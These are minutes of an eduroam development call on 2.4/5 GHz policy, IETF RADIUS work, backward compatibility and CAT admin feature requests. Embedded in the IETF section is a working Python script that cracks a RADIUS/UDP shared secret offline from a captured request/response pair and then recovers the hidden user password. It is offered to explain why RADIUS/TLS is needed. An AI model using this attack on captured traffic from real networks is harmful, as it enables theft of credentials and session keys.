eduroam Development VC Minutes 2022-11-08 1530 CET
Attendance
Attendees
- Stefan Winter (Restena)
- Tomasz Wolniewicz (PSNC)
- Wenche Backman-Kamila (CSC/Funet)
- Ed Kingscote (CANARIE)
- Mohit Sharma (CANARIE)
- Chris Phillips (CANARIE)
- Stephanie Cooper (ANYROAM)
- Philippe Hanset (ANYROAM)
- Zbigniew Ołtuszyk (PSNC)
- Paul Dekkers (SURF)
- Guy Halse (TENET)
- Stefan Paetow (Jisc)
- Maja Gorecka-Wolniewicz (PSNC)
- Mike Zawazcki (Internet2)
- Anders Nilsson (SUNET)
- Ed Wincott (Jisc)
- Arnaud Lauriou (RENATER)
- Kilian Krause (Uni Stuttgart)
- Janos Mohacsi (KIFU)
Regrets
Agenda / Proceedings
Welcome / Agenda Bashing
Chris: inquisitive on sentiment on the 2.4 GHz / 5 GHz trajectory and on base eduroam support (obligations? Is it still 'eduroam' if not on 2.4 GHz?)
No policy issue with providing only 5 GHz - it is still eduroam (for those who are still able to connect)
- observations
- dropping 2.4 GHz reduces coverage, since 2.4 GHz has greater range than 5 GHz
- the (future) 6 GHz band requires 5 GHz support for Wi-Fi Alliance certification
- experience is that users are driven to cheaper devices, many of which are 2.4 GHz only; if 2.4 GHz is disabled, these users are sacrificed and cannot use eduroam
- IETF Update (short - immediate meeting follow-up)
- radextra BoF
- -> a working group is forming (one of its first items will be updating RFC 6614, RADIUS/TLS; defining an SRADIUS that gets rid of shared secrets; deprecating RADIUS/UDP when not on secure networks)
- https://www.ietf.org/mailman/listinfo/radext
- vendors and deployers in the room, broad support for implementing and deploying this
- emu is discussing:
- onboarding issues and server validation
- even eap-metadata was a topic
- private vs. public CA
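To make concrete why radext wants to get rid of the shared secret, the following is an added example written for these minutes (it is not code from eduroam, CAT, the IETF or any RADIUS implementation). It builds a RADIUS/UDP Access-Request / Access-Accept pair under a constructed weak secret and shows that the Response Authenticator (RFC 2865 section 3) is an offline verification oracle: anyone who passively captured the pair can test candidate secrets from a wordlist at one MD5 each, and once the secret is known a User-Password hidden under it (RFC 2865 section 5.2) is recovered too. The user name, password, secret and wordlist are all constructed here. In eduroam the user's credential travels inside EAP rather than in User-Password, but the secret-recovery part applies to any hop still carrying RADIUS/UDP, and the same secret protects the MS-MPPE key attributes that carry the session key back to the access point.

```python
"""Offline dictionary attack on a RADIUS/UDP shared secret from one captured
Access-Request / Access-Accept pair, then recovery of the hidden User-Password.
Added example for these minutes; packets, secret and wordlist are constructed."""
import hashlib
import os
import struct

CODE_ACCESS_REQUEST = 1
CODE_ACCESS_ACCEPT = 2
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
ATTR_REPLY_MESSAGE = 18


def attr(atype: int, value: bytes) -> bytes:
    """Encode one Type-Length-Value RADIUS attribute (length covers the header)."""
    return struct.pack("!BB", atype, len(value) + 2) + value


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 5.2: XOR the NUL-padded password with an MD5 keystream that is
    chained from MD5(secret + Request Authenticator) through each cipher block."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(x ^ y for x, y in zip(padded[i:i + 16], keystream))
        out += block
        prev = block
    return out


def unhide_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password; the chain runs over the cipher blocks."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], keystream))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def packet(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    """Assemble a RADIUS packet: Code, Identifier, Length, Authenticator, attributes."""
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def response_authenticator(code, ident, attrs, request_auth, secret) -> bytes:
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def build_exchange(secret: bytes, user: bytes, password: bytes, ident: int = 7):
    """Constructed client/server exchange as it would cross an unencrypted UDP hop."""
    request_auth = os.urandom(16)
    req_attrs = attr(ATTR_USER_NAME, user) + attr(
        ATTR_USER_PASSWORD, hide_password(password, secret, request_auth))
    request = packet(CODE_ACCESS_REQUEST, ident, request_auth, req_attrs)
    resp_attrs = attr(ATTR_REPLY_MESSAGE, b"Welcome")
    resp_auth = response_authenticator(CODE_ACCESS_ACCEPT, ident, resp_attrs, request_auth, secret)
    return request, packet(CODE_ACCESS_ACCEPT, ident, resp_auth, resp_attrs)


def crack_secret(request: bytes, response: bytes, wordlist):
    """Offline attack: recompute the Response Authenticator for each candidate
    secret and compare with the captured one. Returns the secret or None."""
    request_auth = request[4:20]
    code, ident, length = struct.unpack("!BBH", response[:4])
    resp_attrs, target = response[20:length], response[4:20]
    for cand in wordlist:
        if response_authenticator(code, ident, resp_attrs, request_auth, cand) == target:
            return cand
    return None


def recover_password(request: bytes, secret: bytes):
    """Walk the request's attributes and unhide User-Password with the known secret."""
    request_auth = request[4:20]
    length = struct.unpack("!H", request[2:4])[0]
    pos = 20
    while pos < length:
        atype, alen = request[pos], request[pos + 1]
        if atype == ATTR_USER_PASSWORD:
            return unhide_password(request[pos + 2:pos + alen], secret, request_auth)
        pos += alen
    return None


def demo():
    """Weak constructed secret; the attacker only sees req/resp and a wordlist."""
    secret = b"testing123"
    req, resp = build_exchange(secret, b"alice@example.org", b"correct horse battery")
    wordlist = [b"password", b"radius", b"testing123", b"eduroam"]
    found = crack_secret(req, resp, wordlist)
    return found, (recover_password(req, found) if found else None)


if __name__ == "__main__":
    print(demo())  # (b'testing123', b'correct horse battery')
```

The cost of the attack is one MD5 per candidate, with no interaction with either server, which is why no amount of "pick a strong secret" guidance fixes the design; RADIUS/TLS (RFC 6614) removes the problem on a hop by taking the authenticator and the attributes off the wire in the clear, and that is what the SRADIUS work in radext is about.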
3a. Backward compatibility discussion
- lots of fancy new stuff comes out of IETF, WFA, …
- but there are many devices and people out there that need support for “legacy”; sometimes for 10+ years
- need to strike a balance between embracing new things vs. caring for the long tail of existing deployed tech
- We should try our best to conserve the long-tail connectivity (but not be shy to include new things, so long as they don't break a large part of our user base)
CAT feature requests:
a. “CAT Lower Decks”
* entry-level administrator privileges that can do realm testing, but no config changes
* Good idea?
* Might be useful, via the invitation workflow (choose to invite either a “real” admin or the new role - new roles could age-out automatically)
* Generally interest in this. Investigate how easily this is doable.
b. “NRO View Institution”
* View-only access in the UI to an institution/profile, without taking full control of the organisation.
* Good idea?
* Also nice to have.
* Ephemeral equivalent of “Take Control” - only impersonate IdP for the session.
* maybe even higher prio than a)
c. MAC randomisation control in profiles
* This has been raised before (back when iOS 14 arrived)
* Useful motivations for this?
* Exposure to liability (the OS provides privacy and you block it)
* Bad messaging in OSes if such a feature is on - marketing impact: "eduroam is insecure"
* Conclusion: Not every IdP in the world has to use CAT. Maybe a different product is better for them.
Crazy IETF idea (deferred)
- in an earlier call, someone mentioned the word Passkey; and it happened again during the IETF emu meeting
- It is probably possible to use FIDO2 security keys / Passkeys also for Enterprise Wi-Fi authentication
- We’re talking no less than a brand new EAP type here (“EAP-FIDO”)
- (this agenda item can and will suck up every minute the other topics still leave free)
Recurring: Passpoint hardware and onboarding chit-chat
AOB / next VC: 22 Nov 2022 1530 CET